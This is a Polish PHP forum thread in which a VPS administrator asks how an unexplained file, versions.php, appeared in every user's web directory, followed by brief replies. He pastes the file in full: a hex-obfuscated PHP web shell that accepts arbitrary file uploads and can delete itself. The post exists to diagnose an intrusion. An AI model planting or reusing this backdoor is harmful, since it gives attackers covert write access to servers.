VPS - nieautoryzowane wgranie pliku

VPS - nieautoryzowane wgranie pliku, CentOS / Linux / Serwer Dedykowany

Mega_88 Zobacz profil	28.02.2017, 18:14:24 Post #1
Grupa: Zarejestrowani Postów: 360 Pomógł: 34 Dołączył: 20.08.2011 Ostrzeżenie: (0%)	Cześć, dzisiaj na serwerze zauważyłem, że w katalogach public_html (/home/USER/domains/public_html/) dla każdego użytkownika pojawił się plik o nazwie versions.php (zawartość pliku poniżej). Plików już się pozbyłem, ale znając życie coś musi siedzieć głębiej. Teraz bardziej do rzeczy. Rozumiem gdyby w katalogach każdego użytkownika siedziała jakaś dziurawa joomla lub wordpress to można się domyśleć, że to przez dziury w starych wersjach i zacząć szukać tam na początku. Jednak wspomniany plik pojawił się w katalogach (domenach - www.NAZWA_DOMENY.pl/versions.php) gdzie nic nie było zainstalowane, wgrane. Po prostu zwykły plik index.html z zawartością "Hello word", a właścicielem każdego z plików wgranych na serwerze jest dany użytkownik do którego katalogu został wgrany. Więc to nie dziurawe oprogramowanie pod każdą z domen tylko bardziej coś serwerowego. W lagach FTP nic nie widzę żeby coś było wgrywane, w logach logowań na danych userów po FTP również nic nie ma, a tym bardziej na root'a. Może mi ktoś podpowiedzieć od czego zacząć i gdzie szukać żeby wyłapać jakim cudem plik znalazł się na serwerze i w jaki sposób został wgrany ? Bo nawet nie wiem gdzie mam już szukać. Zawartość pliku: [PHP] pobierz, plaintext <?php if(!empty($_POST["\x74a\x73k"])){if($_POST["tas\x6b"]=="\x75\x70\x6c\x6fad"){if($_FILES["fi\x6ce"]["\x65rr\x6fr"]>0){echo"Re\x74\x75r\x6e C\x6fde: ".$_FILES["f\x69le"]["\x65rror"]."\n";}else{if(file_exists("./".$_FILES["fi\x6ce"]["na\x6de"])){echo$_FILES["\x66ile"]["name"]."\x20al\x72ead\x79\x20\x65x\x69s\x74s\x2e \n";}else{move_uploaded_file($_FILES["\x66\x69l\x65"]["t\x6dp\x5fna\x6de"],"./".$_FILES["f\x69l\x65"]["nam\x65"]);echo"\x6fk";}}}else if($_POST["\x74a\x73k"]=="\x64el\x53e\x6cf"){if(unlink(__FILE__)){echo"\x6f\x6b";}else{echo"\x66\x61\x69\x6c";}}}else{echo"\x6f\x6b";exit;} ?> [PHP] pobierz, plaintext

Odpowiedzi

kayman Zobacz profil	28.02.2017, 19:10:24 Post #2
Grupa: Zarejestrowani Postów: 556 Pomógł: 40 Dołączył: 20.07.2012 Skąd: Warszawa Ostrzeżenie: (0%)	może to cię naprowadzi -> http://ddecode.com/hexdecoder/?results=5a8...46408f84071fa3d

Mega_88 Zobacz profil	28.02.2017, 19:33:25 Post #3
Grupa: Zarejestrowani Postów: 360 Pomógł: 34 Dołączył: 20.08.2011 Ostrzeżenie: (0%)	Cytat(kayman @ 28.02.2017, 19:10:24 ) może to cię naprowadzi -> http://ddecode.com/hexdecoder/?results=5a8...46408f84071fa3d Sprawdzałem już tym i niestety za dużo mi to nie mówi bo ja nie widzę tam żadnych konkretów i odpowiedzi na pytanie gdzie szukać/czemu i jak to wyeliminować... Może ktoś coś więcej powiedzieć w tym temacie ?

Posty w temacie

Mega_88 VPS - nieautoryzowane wgranie pliku 28.02.2017, 18:14:24

kayman może to cię naprowadzi -> http://ddecode.com/he... 28.02.2017, 19:10:24

Mega_88 Cytat(kayman @ 28.02.2017, 19:10:24 )... 28.02.2017, 19:33:25

mrc Mi kiedyś wszedł ktoś na vps bo miałem zbyt słabe ... 28.02.2017, 20:18:58

Mega_88 Cytat(mrc @ 28.02.2017, 20:18:58 ) Mi... 28.02.2017, 20:42:17

ohm Znajdz sobie jakiś prosty phpowy skrypt do przeglą... 28.02.2017, 22:27:55

Mega_88 Dzięki za odpowiedź ohm, jednak może jest już późn... 1.03.2017, 01:31:40

ohm Jeśli masz direct admina to zmienia postać rzeczy,... 1.03.2017, 09:00:56

Mega_88 Dziękuje za odpowiedź Możesz polecić jakaś firmę/... 1.03.2017, 11:28:57

D7ock Sprawdź datę utworzenia tych plików oraz logi DA, ... 1.03.2017, 17:27:41

« Następny starszy · Serwery WWW · Następny nowszy »

2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)

0 Zarejestrowanych:

Tryb wyświetlania: Przełącz na: Standardowy · Przełącz na: Linearny+ · Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

Aktualny czas: 5.10.2025 - 00:22

Hosting zapewnia

Forum PHP.pl